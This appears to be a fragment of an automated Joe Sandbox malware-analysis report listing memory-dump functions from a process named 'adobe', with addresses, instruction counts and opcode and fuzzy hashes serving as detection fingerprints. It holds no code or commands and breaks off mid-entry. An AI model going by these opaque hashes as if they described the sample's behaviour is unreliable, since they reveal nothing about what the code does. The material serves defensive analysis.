Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 845ebb6fc9f1da83bd8081def821b5926de579daadf5355e9541a82d900dd281
Instruction ID: 7f89545a58961a3d52ec56dcb5a271b7ed4aed9a26a3db70a24236d2621c638f
Opcode Fuzzy Hash: 845ebb6fc9f1da83bd8081def821b5926de579daadf5355e9541a82d900dd281
Instruction Fuzzy Hash: 19510A74E16209DFCB00CFA9D584AFEBBB4FB4D682F105466E816A7B15DB389811CF60

Function 08AA92D1 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a79be92396d965134ddee956e5a410ac7e793468d6ae667c8559e9bb36fe6d
Instruction ID: fa3de46ff29eeb4bb7a6de4f4f1a57928e795cd7b3b3c4f019bae6e53e9801f8
Opcode Fuzzy Hash: c4a79be92396d965134ddee956e5a410ac7e793468d6ae667c8559e9bb36fe6d
Instruction Fuzzy Hash: FB41C278D49218DFDB10CFA9D484AEEBFF5BB4A302F186019E82AB7A51D7349945CB10

Function 08AA8609 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a45eff248b3f1813e288201e19e38452e2a2976dad8745ecf71308bbe67afb8a
Instruction ID: abf67d2bf01599bb30f5a218c4cb212e35e15de0c175e00e85af8796ada87138
Opcode Fuzzy Hash: a45eff248b3f1813e288201e19e38452e2a2976dad8745ecf71308bbe67afb8a
Instruction Fuzzy Hash: C9418174A09214CFD704CF59D584AF9BBF8FF4E311B41A4A5E0299BA22D7349815CB40

Function 08AA8618 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befc61a023c1759386319fc946d46397ee63243f89f4f2edf77e1dba7fd2e2e0
Instruction ID: 86c26d756d6d253058f4bfd0d7bd8260463aaee1f2561a0d9ae91303d4ab9b07
Opcode Fuzzy Hash: befc61a023c1759386319fc946d46397ee63243f89f4f2edf77e1dba7fd2e2e0
Instruction Fuzzy Hash: 8F414B74A09615CFD704CF9AD584BBABBF8FF8D701B41A4A5D0299BA26DB349810CF40

Function 08AAC860 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f05a1ce1c504541048b75ccecce77f0aefb6a760c48337d9352bb8d3445045
Instruction ID: df0c3659eea8c81c6d15203268a58e3ab58273df48cf06ebdeaeada6b30983cc
Opcode Fuzzy Hash: f8f05a1ce1c504541048b75ccecce77f0aefb6a760c48337d9352bb8d3445045
Instruction Fuzzy Hash: 14415FB5A002098FDB44EBA4D981BEEBBF6FB88311F109029E615B7745DB345D06CFA1

Function 08AA0D53 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0763b482eb7f6836db991acb923a7638dd364f0fa2e349a79bc6fae31a789c8c
Instruction ID: 477aa27660837dbc867c4760a4c67527de3fc984df5dd4e43f47b17e1e03e3e1
Opcode Fuzzy Hash: 0763b482eb7f6836db991acb923a7638dd364f0fa2e349a79bc6fae31a789c8c
Instruction Fuzzy Hash: BA417731A00609DFCB18DBA4D5947EDBBB6FF88301F14842DE502A77A4EF749946CB51

Function 08AAC870 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 434e10e7efa76a511672003f0da7e3d85f7e6d551e2f11359dbe32d18b962aae
Instruction ID: 7fa7fa77e4ed312b2eb9631576da59afd144ca0c92b461e6e179d4e984582aa1
Opcode Fuzzy Hash: 434e10e7efa76a511672003f0da7e3d85f7e6d551e2f11359dbe32d18b962aae
Instruction Fuzzy Hash: D03130B5B002099FDB44EBA5C981BAEBBF6FB88311F109028E615B7744CB345D02CBA1

Function 08AAA960 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3466b9517fde15e4035094ca136f85b1c19f52b2e5f34a3446c35f1cfb82ada6
Instruction ID: 84351064279f677070772643d79dc5e06e996d398b37a2b4f787344f3fe84d64
Opcode Fuzzy Hash: 3466b9517fde15e4035094ca136f85b1c19f52b2e5f34a3446c35f1cfb82ada6
Instruction Fuzzy Hash: A521F175A002555FCB11EF789850BFFBBFAEBC8220B14452AE409D7B41EB309D0AC7A1

Function 00EDD36C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1812516364.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_edd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e3a888fb18e0b1e28a83af47daa0e579696fb9a7f0da67d70a38bc03f99d06
Instruction ID: 436ae8d1d027f8fdc4ecce67c9234ac24de1928e266e0de1e14f9e76a5a9fc9a
Opcode Fuzzy Hash: 88e3a888fb18e0b1e28a83af47daa0e579696fb9a7f0da67d70a38bc03f99d06
Instruction Fuzzy Hash: 57210471548204DFCB05DF14D9C4B2ABBA5FB84318F24C56EE8095F396C376D847CA62

Function 00EDD1B4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1812516364.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_edd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26912b30633a1335358f0d176e9da1fd7594f7bb9995fe2cd6e7ab386c670317
Instruction ID: bd2921cd1e6100b919bc2145dedb1c421ffc89b912dfdccf58eb72ccefaa1d71
Opcode Fuzzy Hash: 26912b30633a1335358f0d176e9da1fd7594f7bb9995fe2cd6e7ab386c670317
Instruction Fuzzy Hash: 18210471508304DFCB05DF54C9C0B26BBA5FB84318F20C56EE8495B366C336D847CA61

Function 08AAD030 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: addcaec36aacf0cba5a1f03ced7825c9d63935eeb58b582c1fb9cc837ff4d093
Instruction ID: 1007396be1cee4cf65bf425ad0995d834853d49f6c05ac2e45b1484318b37169
Opcode Fuzzy Hash: addcaec36aacf0cba5a1f03ced7825c9d63935eeb58b582c1fb9cc837ff4d093
Instruction Fuzzy Hash: 22212E306443049FC7159B64C951B9E3F75EF46302F24809AD1029BB92DB3A8C06CB92

Function 08AABC80 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdd99736760add08b86460459b065ba575e25f02690e575dcdaff27c243519ce
Instruction ID: 560285dcb1d4b3cc68a3a2046f959f8e9546278b3313585a47723affdbf01029
Opcode Fuzzy Hash: fdd99736760add08b86460459b065ba575e25f02690e575dcdaff27c243519ce
Instruction Fuzzy Hash: BA1101B1A09388DFCB06DF7488669AD7FF8AF4620071448EAD845C7643EA349D02C762

Function 08AAAEF4 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8014cf7bd0e24a2f40143b1caf2d54659b99c160dc3491eec147c806ac6bbf06
Instruction ID: b4ba8471240444f287182b42d8247c7214ceda131dacf61517fc5fac8b955b50
Opcode Fuzzy Hash: 8014cf7bd0e24a2f40143b1caf2d54659b99c160dc3491eec147c806ac6bbf06
Instruction Fuzzy Hash: D411A0B1900229EFDB14DF69D8043EEBBF1BF49322F20826AE418AB950D7744985CBD0

Function 08AA8E92 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b0d03d78374f34ef300d621628c8f496dbdf85709a2bccd0ef9a0e05839fae
Instruction ID: 8c3cd82369a29d9da626ed234e3ba569d78cd266921fcbfcdaf4942244608ea3
Opcode Fuzzy Hash: 32b0d03d78374f34ef300d621628c8f496dbdf85709a2bccd0ef9a0e05839fae
Instruction Fuzzy Hash: CA11C674E05209CBDB14CFA5C4447FDFBB6AF49302F15D16AC42967A51DB78490ACF81

Function 00EDD1AF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1812516364.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_edd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 6791f101f0b13c08c7975fa87533ffe2c47fce29d7b08236877d8b273fed6394
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 16119D75508280DFDB06CF54D9C4B15BFB1FB84318F24C6AAD8494B766C33AD85ACBA1

Function 00EDD367 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1812516364.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_edd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 90f2ec2660ec49db48eeb5ce053792fe9c42f49aeb98b5fb882f5bfbac1bf468
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: CF11BE75508240CFCB02CF14D9C4B15BF61FB84318F24C6AAD8094B756C33AE84BCB51

Function 08AAD022 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7be923df0614f97cf38e303847d9ea6f30289cc3b9d614fffc76d067ce6f81cf
Instruction ID: a6b3fb139c132b3059689ea350720c52df5210f604e119f7c9ed055777b3647d
Opcode Fuzzy Hash: 7be923df0614f97cf38e303847d9ea6f30289cc3b9d614fffc76d067ce6f81cf
Instruction Fuzzy Hash: 8001D234B042008FD7159F54DA82F9E3772EB85613F24809DE5166BFA5CB3A8802CB82

Function 08AA8E17 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a333df272fed5a2592f11ba0fde8be36afd7fd0462072e26fa6958cc5e71f48a
Instruction ID: 50220c503748aabc4853eadbffd1e832d8c4228bf6816d638bb9be23b24136dc
Opcode Fuzzy Hash: a333df272fed5a2592f11ba0fde8be36afd7fd0462072e26fa6958cc5e71f48a
Instruction Fuzzy Hash: A411C434D0A354CBDB05CFA5C4047FEBBBAAF8A302F04D06AD41967652DB784948CF91

Function 00ECD781 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1812460530.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ecd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698edf6b44b9cac440074332bc3adef2c281f95fa57229bf238db5a4ae6cfca5
Instruction ID: d66dc98561e73b4d26bf3f3ba37b7a4fb6269b711463112f87a779b4215d09d3
Opcode Fuzzy Hash: 698edf6b44b9cac440074332bc3adef2c281f95fa57229bf238db5a4ae6cfca5
Instruction Fuzzy Hash: 0301A73100C3449AE7109A29CE84BA7BFD8EF51324F18D43FED096A296C77B9C41C671

Function 08AA8E28 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e195b18a82024ba6ada6fa9c3c3c871382fc3ab4c1d051273db69232754d7864
Instruction ID: 06ade9d6551a58bce4baa8b70ab6b86f86d0c5f051716ae13dd8b79a4201ca8d
Opcode Fuzzy Hash: e195b18a82024ba6ada6fa9c3c3c871382fc3ab4c1d051273db69232754d7864
Instruction Fuzzy Hash: 0B017C30E05209CBDB08CFA6C404BBEFBBAAB89701F00D02AD81967B51DBB84904CF80

Function 08AA9EBC Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc829c95dbaa76e79bde2e187dde903dbb395bfe4a68e5739232fb2a02af9390
Instruction ID: af95b00e30480b2ccbdef2dd9e99474826dadf016b8423ec05f15e3ee16391e1
Opcode Fuzzy Hash: dc829c95dbaa76e79bde2e187dde903dbb395bfe4a68e5739232fb2a02af9390
Instruction Fuzzy Hash: 61F01234E0925ACBCF20CF94E4407FFBBB9AF49217F146415E425E3E52E7319A668B50

Function 08AA4D70 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e80e2daa74c5a566332d3a0f0ce483b0309d81541d5108828360def56462b0
Instruction ID: 8f173d554d634befc57b6383093e109e71e9728cc20bb773c2cc1764d1cda396
Opcode Fuzzy Hash: 77e80e2daa74c5a566332d3a0f0ce483b0309d81541d5108828360def56462b0
Instruction Fuzzy Hash: DFF06DB57002005BC20477A8D596FAE37FAE7D5626F649429B509D738CCE298C07CB91

Function 00ECD780 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1812460530.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ecd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16fd05e4c2feffe7cea53fe341c331bbcf572d3ccf808930c0301f6209989819
Instruction ID: b1ccf8d080f5bb7d87c891a74f2b67d5a4a8975155060715635db6f6fd3b663c
Opcode Fuzzy Hash: 16fd05e4c2feffe7cea53fe341c331bbcf572d3ccf808930c0301f6209989819
Instruction Fuzzy Hash: 0BF06271408344AEE7208A1ACD84B66FFE8EB51738F18C46AED085E296C37A9C45CA71

Function 08AABD29 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b0746e79d1b38532eb41c917a8c7726b1e288860bc0360731c576b2f75dd55
Instruction ID: 74f4cd04f5769ad1e25074f9dddc1c7ff25e25f303e6644f0bf5af29acba1d7f
Opcode Fuzzy Hash: a8b0746e79d1b38532eb41c917a8c7726b1e288860bc0360731c576b2f75dd55
Instruction Fuzzy Hash: 82F0BE32204118AFCB19DFA8E840ADE7FF6EF0D210B1480ABE084C7221E330AA42C754

Function 08AAAF00 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17054a1888a811c3aa017782a948dcb9c73fc5061c4b978cb08028b2f4abab1
Instruction ID: 9aa5fea387c9afd0afcbaefb52e4e9ac586b9e872742c5dee8c651495ce37ca5
Opcode Fuzzy Hash: e17054a1888a811c3aa017782a948dcb9c73fc5061c4b978cb08028b2f4abab1
Instruction Fuzzy Hash: 0101FBB0800229DFDB18DF6AC4043EEBAF1BF48351F10C229E429ABA90D7B45A44CF90

Function 08AA4D80 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c907025d9011972f40b81db25ca261b777827b02132c8417cef95eb8ea993b2d
Instruction ID: 903cc45b8c473138900e762230e7ea08b73efa2bf3c3ab184016dc8210e6a72a
Opcode Fuzzy Hash: c907025d9011972f40b81db25ca261b777827b02132c8417cef95eb8ea993b2d
Instruction Fuzzy Hash: D5F054747002044BC24477A8D555F5F36FAE7D5765B505429B5059734CCE358C03CB91

Function 08AAAFA0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07256ef93e04df31a459aa04eefd868ff56cc379ff60de5aebb4bd37b709100b
Instruction ID: a61e149f704a1e83d7480f9b2de1eab510aa8da0ddacfce2aed28f392b1633a3
Opcode Fuzzy Hash: 07256ef93e04df31a459aa04eefd868ff56cc379ff60de5aebb4bd37b709100b
Instruction Fuzzy Hash: 5EE06D727041286F9304DA6EDC84D6BBBEDFBCC670311807AF508C7310D9319C01C6A0

Function 08AAAF9E Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2afd84ef1e253dae01b0a0a5ad0c4e51f59f4d63612092b6247cfa5a5b13c9
Instruction ID: 2ce83dfd9e0ef0b5031fde15d8da5f831d126fdfe0ce8a89095803df63deba0c
Opcode Fuzzy Hash: cf2afd84ef1e253dae01b0a0a5ad0c4e51f59f4d63612092b6247cfa5a5b13c9
Instruction Fuzzy Hash: 44E06DB67001245F9304DBAED884D6BB7E9FBCC261321807AF508C7310DA319C05C7A0

Function 08AA076B Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2d7ad477246c5c312f9442127e58b0146e20709c2ed9b0fcccebdb6a8d5c0fc
Instruction ID: 9273094cd6cfa404f916fdbfe1c3a0d5945a768936ba6e5162f6b14348bf4f3a
Opcode Fuzzy Hash: c2d7ad477246c5c312f9442127e58b0146e20709c2ed9b0fcccebdb6a8d5c0fc
Instruction Fuzzy Hash: 5FE09238714704DBDA44A679DA517AB77BAD7C06D5F004069E701EBBC8DFA2DC024BE1

Function 08AA0770 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beae4c4c842c653e9ffa158e90276cffc2bea3a290287be889b4473e2cde3109
Instruction ID: 021301b6c775dcbf7ae3cf235a99de9ff339c53c13840781c82ab77fc2d27b8c
Opcode Fuzzy Hash: beae4c4c842c653e9ffa158e90276cffc2bea3a290287be889b4473e2cde3109
Instruction Fuzzy Hash: 5FE092387147048BEA00A679DA51BA777AAD7807D5F004429E701DBBC8DFA3DC024BE1

Function 08AABC19 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e6de5cbb329205674f1722b254b5d56dc1b9aff3ab69621986d43347e838df
Instruction ID: 881a737c1ce67fb1fc8bf46bdda4721655e24e38562431de0cb34cb882d5f132
Opcode Fuzzy Hash: 90e6de5cbb329205674f1722b254b5d56dc1b9aff3ab69621986d43347e838df
Instruction Fuzzy Hash: 56E0863184D288DEC702DFB496115DA7FF0DF4B20135008DFD0859B512E6314A0ED792

Function 08AA908C Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 942f27b05bed991766291c5006ddfcc3db5e6c17771668d4f67a34878b453634
Instruction ID: 2300bb91405f3ebe9bf8324da3c15b597f0cb4fa56fe547936ba341a3042458e
Opcode Fuzzy Hash: 942f27b05bed991766291c5006ddfcc3db5e6c17771668d4f67a34878b453634
Instruction Fuzzy Hash: ADE0EC3484E305CFCB008BA4C048BBDBBBDAF0B712B015091D45A9BA52C7BC9844CE54

Function 08AABAEF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e704b0d5fedd833e8409a8f0c9f91ef1c355d0da620c121eec03d5da1176db31
Instruction ID: fbdeaf6cb44546de24d2bba919ff840bf4751417fa8de05f861fc16d8d79a59a
Opcode Fuzzy Hash: e704b0d5fedd833e8409a8f0c9f91ef1c355d0da620c121eec03d5da1176db31
Instruction Fuzzy Hash: 94D05B3510D3805FC201DB048850CE6B776ABD6110714858BFC5087751C726CD17C7A1

Function 08AA90AA Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
Instruction ID: 544cb4247afde885f7aa4526af655624d58396403fd2cc9390bec168ae8a16a1
Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
Instruction Fuzzy Hash: C7D01738C4E208CBCB00CB61C484BBDFB7DBB0A703B01A455C82A6BE02C7B89844CA00

Function 08AA43F7 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f17ad233badbefc1c2b247a0c9c3b957aa4cc21f61a1ea2f5f46479488787296
Instruction ID: 9616549a050d25d3c6445e76317323c57235c19aadfe994cf09e9399eb61765a
Opcode Fuzzy Hash: f17ad233badbefc1c2b247a0c9c3b957aa4cc21f61a1ea2f5f46479488787296
Instruction Fuzzy Hash: 4ED017B26093905FD301CA04CC50A96BBA5EFE6300F1A888BA48097392D6619D0BCB61

Function 08AAF6C8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c604b2482fbd880baee47bf8de8f1e12b9b45ab8f89e21d896a72459c7eadc
Instruction ID: a20b2ec102f30dd8a6874083893d62b2776d41c442bb076ca809cc6d14623635
Opcode Fuzzy Hash: 30c604b2482fbd880baee47bf8de8f1e12b9b45ab8f89e21d896a72459c7eadc
Instruction Fuzzy Hash: CAE01274D11208DFCB44DFF9D44579CBFF4AB04201F1080A9E80493750EB705A40CF81

Function 08AACCF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: affb4edc3fc6cda19fe3e10de697396bcddafdded7bc71eb297fc5abd215b699
Instruction ID: d61c3a896c1b6313521463de61adb4014f446a1b3ec9f21dad6e6982006a391f
Opcode Fuzzy Hash: affb4edc3fc6cda19fe3e10de697396bcddafdded7bc71eb297fc5abd215b699
Instruction Fuzzy Hash: E5E0EC749082588FDB50DF54D8907AEBBF5BB09310F109185D059E7701E73099408F41

Function 08AA2E51 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
